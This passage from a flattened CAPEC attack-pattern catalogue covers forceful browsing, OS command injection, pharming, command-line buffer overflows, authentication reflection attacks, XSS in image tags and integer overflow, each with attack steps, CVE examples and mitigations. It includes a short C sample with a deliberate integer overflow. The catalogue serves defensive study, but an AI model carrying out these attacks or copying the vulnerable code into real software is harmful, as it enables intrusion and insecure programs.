available Having a directory listing also points to the available pages and resources in the application that may be forcibly browseable. Authenticate request to every resource. In addition, every page or resource must ensure that the request it is handling has been made in an authorized context. Forceful browsing can also be made difficult to a large extent by not hard-coding names of application pages or resources. This way, the attacker cannot figure out, from the application alone, the resources available from the present context. Confidentiality Read files or directories Confidentiality Access_Control Authorization Bypass protection mechanism 425 Targeted 285 Secondary 693 Targeted CVE-2007-1156 JBrowser allows remote attackers to bypass authentication and access certain administrative capabilities via a direct request for _admin/. CVE-2007-1062 The Cisco Unified IP Conference Station 7935 3.2(15) and earlier, and Station 7936 3.3(12) and earlier does not properly handle administrator HTTP sessions, which allows remote attackers to bypass authentication controls via a direct URL request to the administrative HTTP interface for a limited time 1000 Category ChildOf 210 333 Category HasMember 367 Complete Mediation Reluctance To Trust Treat the Entire Inherited Process Context as Unvalidated Input Use Authentication Mechanisms, Where Appropriate, Correctly Chiradeep B. Chhaya 2007-03-13 First Draft Chiradeep B. Chhaya 2007-03-13 First Draft Sean Barnum Cigital, Inc 2007-04-16 Review and revise Paco Hope Cigital, Inc. 2007-10-20 Added extended Attack Execution Flow Sean Barnum Cigital, Inc 2007-04-16 Review and revise Paco Hope Cigital, Inc. 2007-10-20 Added extended Attack Execution Flow CAPEC Content Team MITRE 2013-12-18 Updated Description Summary, Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Examples-Instances, Probing_Techniques, Typical_Likelihood_of_Exploit An attacker can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system. Identify inputs for OS commands The attacker determines user controllable input that gets passed as part of a command to the underlying operating system. Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports. env-Local env-CommProtocol env-Peer2Peer env-ClientServer TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, he attempts to guess the actual operating system. env-Embedded env-ClientServer env-Peer2Peer env-CommProtocol env-Web Induce errors to find informative error messages env-All The target software accepts connections via the network. env-Web env-CommProtocol env-Peer2Peer env-Embedded env-ClientServer Operating environment (operating system, language, and/or middleware) is correctly identified. Multiple candidate operating environments are suggested. Provide misleading information on TCIP/IP fingerprints (some operating systems can be configured to send signatures that match other operating systems). Provide misleading information at the server level (e.g., Apache, IIS, WebLogic, etc.) to announce a different server software. Some fingerprinting techniques can be detected by operating systems or by network IDS systems because they leave the network connection half-open, or they do not belong to a valid, open connection. Survey the Application The attacker surveys the target application, possibly as a valid and authenticated user Spidering web sites for all available links env-Web Inventory all application inputs env-All Attacker develops a list of valid inputs env-All The attacker develops a list of likely command delimiters. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Monitor velocity of feature activations (non-web software). Humans who activate features (click buttons, request actions, invoke APIs, etc.) will do so far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Vary inputs, looking for malicious results. Depending on whether the application being exploited is a remote or local one the attacker crafts the appropriate malicious input, containing OS commands, to be passed to the application Inject command delimiters using network packet injection tools (netcat, nemesis, etc.) env-CommProtocol env-Web env-Peer2Peer env-ClientServer Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.) env-Web Inventorying in prior step is successful. env-All One or more injections that are appropriate to the platform provokes an unexpected response from the software, which can be varied by the attacker based on the input. Execute malicious commands The attacker may steal information, install a back door access mechanism, elevate privileges or compromise the system in some other way. The attacker executes a command that stores sensitive information into a location where he can retrieve it later (perhaps using a different command injection). env-All The attacker executes a command that stores sensitive information into a location where he can retrieve it later (perhaps using a different command injection). env-All The attacker executes a command that stores sensitive information into a location where he can retrieve it later (perhaps using a different command injection). env-All The software performs an action the attacker desires. This might be displaying information, storing a program, executing a command, or some other malicious activity. Make commonly exploited administrative tools log their execution. Make commonly exploited administrative tools non-executable, except when the system is in specific maintenance periods. (i.e., require administrators to specifically enable certain administrative commands prior to performing system maintenance.) User controllable input used as part of commands to the underlying operating system. High High There is high motivation for the attacker to seek out and discover opportunities for this attack due to the power it yields. Injection API Abuse A transaction processing system relies on code written in a number of languages. To access this functionality, the system passes transaction information on the system command line. An attacker can gain access to the system command line and execute malicious commands by injecting these commands in the transaction data. If successful, the attacker can steal information, install backdoors and perform other nefarious activities that can compromise the system and its data. A vulnerability in Mozilla Firefox 1.x browser allows an attacker to execute arbitrary commands on the UNIX/Linux operating system. The vulnerability is caused due to the shell script used to launch Firefox parsing shell commands that are enclosed within back-ticks in the URL provided via the command line. This can be exploited to execute arbitrary shell commands by tricking a user into following a malicious link in an external application which uses Firefox as the default browser (e.g. the mail client Evolution on Red Hat Enterprise Linux 4). High The attacker needs to have knowledge of not only the application to exploit but also the exact nature of commands that pertain to the target operating system. This may involve, though not always, knowledge of specific assembly commands for the platform. Use language APIs rather than relying on passing data to the operating system shell or command line. Doing so ensures that the available protection mechanisms in the language are intact and applicable. Filter all incoming data to escape or remove characters or strings that can be potentially misinterpreted as operating system or shell commands All application processes should be run with the minimal privileges required. Also, processes must shed privileges as soon as they no longer require them. Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Access_Control Authorization Gain privileges / assume identity Bypass protection mechanism Confidentiality Read application data User-controllable input used as part of operating system commands Operating system commands injected by the attacker, intended to escalate privilege or divulge information Underlying operating system hosting the exploited application. The injected OS commands are interpreted by the shell, causing them to be executed under the privileges of the process running the exploited application. 78 Targeted 88 Secondary 20 Secondary 697 Targeted 713 Targeted 1000 Attack Pattern ChildOf 15 333 Category HasMember 364 Least Privilege Reluctance To Trust Never Use Unvalidated Input as Part of a Directive to any Internal Component Penetration Exploitation High High High All All All All Secunia Advisory SA16869: Firefox Command Line URL Shell Command Injection Secunia Advisories Secunia September 20, 2005 http://secunia.com/advisories/16869/ Chiradeep B. Chhaya 2007-03-16 First Draft Chiradeep B. Chhaya 2007-03-16 First Draft Sean Barnum Cigital, Inc 2007-04-16 Review and revise Sean Barnum Cigital, Inc 2007-04-16 Review and revise CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Examples-Instances, Solutions_and_Mitigations A pharming attack occurs when the victim is fooled into entering sensitive data into supposedly trusted locations, such as an online bank site or a trading platform. An attacker can impersonate these supposedly trusted sites and have the victim be directed to his site rather than the originally intended one. Pharming does not require script injection or clicking on malicious links for the attack to succeed. Attacker sets up a system mocking the one trusted by the users. This is usually a website that requires or handles sensitive information. The attacker then poisons the resolver for the targeted site. This is achieved by poisoning the DNS server, or the local hosts file, that directs the user to the original website When the victim requests the URL for the site, the poisoned records direct the victim to the attackers' system rather than the original one. Because of the identical nature of the original site and the attacker controlled one, and the fact that the URL is still the original one, the victim trusts the website reached and the attacker can now "farm" sensitive information such as credentials or account numbers. Vulnerable DNS software or improperly protected hosts file or router that can be poisoned A website that handles sensitive information but does not use a secure connection and a certificate that is valid is also prone to pharming Very High High Spoofing Analysis Modification of Resources An online bank website requires users to provide their customer ID and password to log on, but does not use a secure connection. An attacker can setup a similar fake site and leverage pharming to collect this information from unknowing victims. Medium The attacker needs to be able to poison the resolver - DNS entries or local hosts file or router entry pointing to a trusted DNS server - in order to successfully carry out a pharming attack. Setting up a fake website, identical to the targeted one, does not require special skills. Except having enough knowledge of the way the targeted site has been structured in order to create a fake version, no additional resources are required. Poisoning the resolver requires knowledge of a vulnerability that can be exploited. The attacker observes the targeted website for use of secure connection to exchange sensitive information. If it does not use secure connections, victim users cannot distinguish between the original and fake versions of the website. The attacker can also fingerprint the software running on the targeted system (DNS server, router or host) and look for vulnerabilities in order to poison the entries. All sensitive information must be handled over a secure connection. Known vulnerabilities in DNS or router software or in operating systems must be patched as soon as a fix has been released and tested. End users must ensure that they provide sensitive information only to websites that they trust, over a secure connection with a valid certificate issued by a well-known certificate authority. Confidentiality Read application data 346 Targeted 247 Targeted 292 Targeted CVE-2005-0877 Dnsmasq before 2.21 allows remote attackers to poison the DNS cache via answers to queries that were not made by Dnsmasq. CVE-2004-1754 The DNS proxy (DNSd) for multiple Symantec Gateway Security products allows remote attackers to poison the DNS cache via a malicious DNS server query response that contains authoritative or additional records. 1000 Attack Pattern ChildOf 151 1000 Attack Pattern ChildOf 161 Reluctance To Trust Promoting Privacy Use Authentication Mechanisms, Where Appropriate, Correctly Use Well-Known Cryptography Appropriately and Correctly Reconnaissance High High Low Client-Server SOA All All All Chiradeep B. Chhaya 2007-03-12 First Draft Chiradeep B. Chhaya 2007-03-12 First Draft Sean Barnum Cigital, Inc 2007-04-16 Review and revision of content Sean Barnum Cigital, Inc 2007-04-16 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Solutions_and_Mitigations This attack targets command-line utilities available in a number of shells. An attacker can leverage a vulnerability found in a command-line utility to escalate privilege to root. Attacker identifies command utilities exposed by the target host. On the probing stage, the attacker interacts with the command utility and observes the results of its input. The attacker's goal is to uncover a buffer overflow in the command utility. For instance the attacker may find that input data are not properly validated. The attacker finds a buffer overflow vulnerability in the command utility and tries to exploit it. He crafts malicious code and injects it using the command utility. The attacker can at worst execute remote code on the target host. The target host exposes a command-line utility to the user. The command-line utility exposed by the target host has a buffer overflow vulnerability that can be exploited. High High Injection API Abuse Attack Example: HPUX passwd A buffer overflow in the HPUX passwd command allows local users to gain root privileges via a command-line option. Attack Example: Solaris getopt A buffer overflow in Solaris's getopt command (found in libc) allows local users to gain root privileges via a long argv[0]. Low An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS. High Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level. The attacker can probe for services available on the target host. Many services may expose a command utility. For instance Telnet is a service which can be invoked through a command shell. Carefully review the service's implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as buffer overflow. Use a language or compiler that performs automatic bounds checking. Use an abstraction library to abstract away risky APIs. Not a complete solution. Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution. Operational: Use OS-level preventative functionality. Not a complete solution. Apply the latest patches to your user exposed services. This may not be a complete solution, especially against a zero day attack. Do not unnecessarily expose services. Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Integrity Modify memory Availability DoS: crash / exit / restart Confidentiality Read memory The user supplied data. The buffer overrun by the attacker. When the function returns control to the main program, it jumps to the return address portion of the stack frame. Unfortunately that return address may have been overwritten by the overflowed buffer and the address may contain a call to a privileged command or to a malicious code. The most common is remote code execution. 120 Targeted 118 Targeted 119 Targeted 74 Targeted 20 Targeted 680 Targeted 733 Secondary 697 Targeted 1000 Attack Pattern ChildOf 100 1000 Attack Pattern ChildOf 10 Reluctance to trust Defense in Depth Least Privilege Bound checking should be performed when copying data to a buffer. Penetration High High High All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-119: Buffer Errors Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/119.html [R.9.1][REF-2] Cigital, Inc 2007-03-01 [R.9.1][REF-2] Cigital, Inc 2007-03-01 Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Attack Execution Flow, Probing Techniques and Method of Attack Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback MITRE Content Team MITRE 2013-06-21 Updated Skill_or_Knowledge_Level and Skill_or_Knowledge_Type Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Attack Execution Flow, Probing Techniques and Method of Attack Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Solutions_and_Mitigations An attacker can abuse an authentication protocol susceptible to reflection attack in order to defeat it. Doing so allows the attacker illegitimate access to the target system, without possessing the requisite credentials. Reflection attacks are of great concern to authentication protocols that rely on a challenge-handshake or similar mechanism. An attacker can impersonate a legitimate user and can gain illegitimate access to the system by successfully mounting a reflection attack during authentication. The attacker opens a connection to the target server and sends it a challenge The server responds by returning the challenge encrypted with a shared secret as well as its own challenge to the attacker Since the attacker does not possess the shared secret, he initiates a second connection to the server and sends it, as challenge, the challenge received from the server on the first connection The server treats this as just another handshake and responds by encrypting the challenge and issuing its own to the attacker The attacker now receives the encrypted challenge on the second connection and sends it as response to the server on the first connection, thereby successfully completing the handshake and authenticating to the server. The attacker must have direct access to the target server in order to successfully mount a reflection attack. An intermediate entity, such as a router or proxy, that handles these exchanges on behalf of the attacker inhibits the attackers' ability to attack the authentication protocol. High High Authentication is usually used as a means to identify and grant access to the user. If the authentication protocol can be defeated, in this instance by a reflection attack, authentication serves no purpose in identifying the legitimate users of the system from the illegitimate ones Protocol Manipulation Spoofing A single sign-on solution for a network uses a fixed pre-shared key with its clients to initiate the sign-on process in order to avoid eavesdropping on the initial exchanges. An attacker can use a reflection attack to mimic a trusted client on the network to participate in the sign-on exchange. Medium The attacker needs to have knowledge of observing the protocol exchange and managing the required connections in order to issue and respond to challenges All that the attacker requires is a means to observe and understand the protocol exchanges in order to reflect the challenges appropriately. The server must initiate the handshake by issuing the challenge. This ensures that the client has to respond before the exchange can move any further The use of HMAC to hash the response from the server can also be used to thwart reflection. The server responds by returning its own challenge as well as hashing the client's challenge, its own challenge and the pre-shared secret. Requiring the client to respond with the HMAC of the two challenges ensures that only the possessor of a valid pre-shared secret can successfully hash in the two values. Introducing a random nonce with each new connection ensures that the attacker cannot employ two connections to attack the authentication protocol Confidentiality Access_Control Authorization Gain privileges / assume identity Bypass protection mechanism Confidentiality Read application data 301 Targeted 303 Secondary 718 Targeted 1000 Attack Pattern ChildOf 220 1000 Attack Pattern ChildOf 204 1000 Attack Pattern ChildOf 114 Reluctance To Trust Complete Mediation Defense in Depth Use Authentication Mechanisms, Where Appropriate, Correctly Penetration Exploitation High High Low Client-Server SOA All All All Chiradeep B. Chhaya 2007-03-13 First Draft Chiradeep B. Chhaya 2007-03-13 First Draft Sean Barnum Cigital, Inc 2007-04-16 Review and revision of content Sean Barnum Cigital, Inc 2007-04-16 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Attack_Prerequisites, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit Image tags are an often overlooked, but convenient, means for a Cross Site Scripting attack. The attacker can inject script contents into an image (IMG) tag in order to steal information from a victim's browser and execute malicious scripts. Spider Using a browser , an attacker is looking at the application to figure out if it allows to specify images, upload them, etc. Use a browser to manually explore the website and identify entry points where the application allows the upload (or other means of specification) of images. Many browsers' plugins are available to facilitate the analysis or automate the discovery. env-Web The application has image upload functionality. env-Web The application allows users to point to or otherwise specify images. env-Web No parameters appear to be used on the current page. Even though none appear, the web application may still use them if they are provided. env-Web Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible. env-Web A list entry points where images can be specified. Do not allow user upload or specification of images Proceed to a temporary account lockout when the user does too many suspicious attempts using image upload. Probe identified potential entry points for XSS vulnerability The attacker uses the entry points gathered in the "Explore" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited. Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side non-script elements context and observe system behavior to determine if script was executed. env-Web Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side non-script elements context and observe system behavior to determine if script was executed. env-Web Use a proxy tool to record results of the created requests. env-Web The output of pages includes image tags specified by users. env-Web Output to the browser is not encoded to remove executable scripting syntax. env-Web The attacker's script string is being reflected verbatim at some point in the web site (if not on the same page). Note that sometimes, the payload might be well encoded in the page, but wouldn't be encoded at all in some other section of the same web page (title, etc.) All context-sensitive characters are consistently re-encoded before being sent to the web browser. For example, in a HTML tag element, the payload may not be able to evade the quotes in order to inject another attribute. Some sensitive characters are consistently encoded, but others are not. Depending on which type of non-script element the payload is injected in, it may be possible to evade the encodings. Monitor input to web servers (not only GET, but all potential inputs like COOKIES, POST, HEADER), application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard XSS probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that hackers use. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Steal session IDs, credentials, page content, etc. As the attacker succeeds in exploiting the vulnerability, he can choose to steal user's credentials in order to reuse or to analyze them later on. Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker. env-Web Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately. env-Web The attacker gets the user's cookies or other session identifiers. The attacker gets the content of the page the user is viewing. The attacker causes the user's browser to visit a page with malicious content. Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Forceful browsing When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not). Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site env-Web Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities). env-Web The attacker indirectly controls the user's browser and makes it performing actions exploiting CSRF. The attacker manipulates the browser through the steps that he designed in his attack. The user, identified on a website, is now performing actions he is not aware of. Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Content spoofing By manipulating the content, the attacker targets the information that the user would like to get from the website. Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page. env-Web The user sees a page containing wrong information Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Application permitting the inclusion or use of IMG tags High High Techniques for discovery of XSS as well as tools and means to exploit them are fairly widely available and understood Injection An online discussion forum allows its members to post HTML-enabled messages, which can also include image tags. A malicious user can embed JavaScript in the IMG tags in his messages that get executed within the victim's browser whenever the victim reads these messages. The malicious user can leverage Cross Site Scripting in image tags to steal sensitive information, such as usernames, passwords or cookies, and impersonate other users on the forum. Medium Besides the ability to figure out possibilities of injection, the attacker requires moderate scripting skills to successfully leverage cross site scripting in image tags None In addition to the traditional input fields, all other user controllable inputs, such as image tags within messages or the likes, must also be subjected to input validation. Such validation should ensure that content that can be potentially interpreted as script by the browser is appropriately filtered. All output displayed to clients must be properly escaped. Escaping ensures that the browser interprets special scripting characters literally and not as script to be executed. Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Read application data User-controllable input to the application. Any input that can legitimately accept and render HTML image tag can be used as an injection vector. HTML Image tag pointing to script or location of attacker's choice. Victim's web browser. Execution of the script in the victim's browser, contained in the image tag or from the location pointed to within the image tag. 82 Targeted 79 Targeted 74 Secondary 20 Secondary 692 Targeted 697 Targeted 713 Targeted 71 Targeted CVE-2002-1808 Cross-site scripting (XSS) vulnerability in Meunity Community System 1.1 allows remote attackers to inject arbitrary web script or HTML via JavaScript in an IMG tag when creating a topic. CVE-2006-6919 Firefox Sage extension 1.3.8 and earlier allows remote attackers to execute arbitrary JavaScript in the local context via an RSS feed with an img tag containing the script followed by an extra trailing ">", which Sage modifies to close the img element before the malicious script. 1000 Attack Pattern ChildOf 18 Reluctance To Trust Defense In Depth Never Use Unvalidated Input as Part of a Directive to any Internal Component Treat the Entire Inherited Process Context as Unvalidated Input Penetration Exploitation High High High Client-Server SOA All All All Chiradeep B. Chhaya 2007-03-15 First Draft Chiradeep B. Chhaya 2007-03-15 First Draft Sean Barnum Cigital, Inc 2007-04-16 Review and revise Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description Sean Barnum Cigital, Inc 2007-04-16 Review and revise Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases This attack forces an integer variable to go out of range. The integer variable is often used as an offset such as size of memory allocation or similarly. The attacker would typically control the value of such variable and try to get it out of range. For instance the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value which can lead to unexpected behavior. At worst the attacker can execute arbitrary code. The first step is exploratory meaning the attacker looks for an integer variable that he can control. The attacker finds an integer variable that he can write into or manipulate and try to get the value of the integer out of the possible range. The integer variable is forced to have a value out of range which set its final value to an unexpected value. The target host acts on the data and unexpected behavior may happen. The attacker can manipulate the value of an integer variable utilized by the target host. The target host does not do proper range checking on the variable before utilizing it. When the integer variable is incremented or decremented to an out of range value, it gets a very different value (e.g. very small or negative number) High High Modification of Resources Injection API Abuse Analysis Integer overflow in the ProcAuWriteElement function in server/dia/audispatch.c in Network Audio System (NAS) before 1.8a SVN 237 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large max_samples value. CVE-2007-1544 The following code illustrates an integer overflow. The declaration of total integer as "unsigned short int" assumes that the length of the first and second arguments fits in such an integer. include <stdlib.h> include <string.h> include <stdio.h> int main (int argc, char *const *argv) { if (argc !=3){ printf("Usage: prog_name <string1> <string2>\n"); exit(-1); } unsigned short int total; total = strlen(argv[1])+strlen(argv[2])+1; char * buff = (char *)malloc(total); strcpy(buff, argv[1]); strcpy(buff, argv[2]); } [R.92.4], [R.92.5] Low An attacker can simply overflow an integer by inserting an out of range value. High Exploiting a buffer overflow by injecting malicious code into the stack of a software system or even the heap can require a higher skill level. Vulnerability testing tool can be used to probe for integer overflow (e.g. fuzzer). Use a language or compiler that performs automatic bounds checking. Carefully review the service's implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as integer overflow. Use an abstraction library to abstract away risky APIs. Not a complete solution. Always do bound checking before consuming user input data. Integrity Modify application data Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Read application data Availability DoS: crash / exit / restart The user supplied data. The integer overrun by the attacker. When the function use the integer as offset, the offset may be out of the expected range which may lead to unexpected behavior such as issues of availability. The most common are issues of availability. In some situation, an integer overflow can turn out to be an exploitable buffer overflow, then the attacker may be able to run arbitrary code on the target host. 190 Targeted 128 Targeted 120 Targeted 122 Secondary 196 Secondary 680 Targeted 697 Targeted 1000 Attack Pattern ChildOf 128 Reluctance to Trust Exploitation Low Medium High All All All All J. Viega G. McGraw Building Secure Software Addison-Wesley 2002 Common Weakness Enumeration (CWE) CWE-190 - Integer overflow (wrap or wraparound) Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/190.html The OWASP Application Security Desk Reference Integer overflow The Open Web Application Security Project (OWASP) 2009 http://www.owasp.org/index.php/Integer_overflow Robert C. Seacord SAMATE - Software Assurance Metrics And Tool Evaluation Test Case ID 1511 National Institute of Standards and Technology (NIST) 2006-05-22 http://samate.nist.gov/SRD/view_testcase.php?tID=1511 Robert C. Seacord Secure Coding in C and C++ Page 152, Figure 5-1 Sean Barnum Cigital, Inc. 2007-03-25 Identified priority for pattern creation Sean Barnum Cigital, Inc. 2007-03-25 Identified priority for pattern creation Eric Dalci Cigital, Inc. 2007-03-25 Fleshed out content for pattern Sean Barnum Cigital, Inc 2007-04-16 Review and revise MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Skill_or_Knowledge_Level and Skill_or_Knowledge_Type Eric Dalci Cigital, Inc. 2007-03-25 Fleshed out content for pattern Sean Barnum Cigital, Inc 2007-04-16 Review and revise CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Payload_Activation_Impact This attack targets the log fi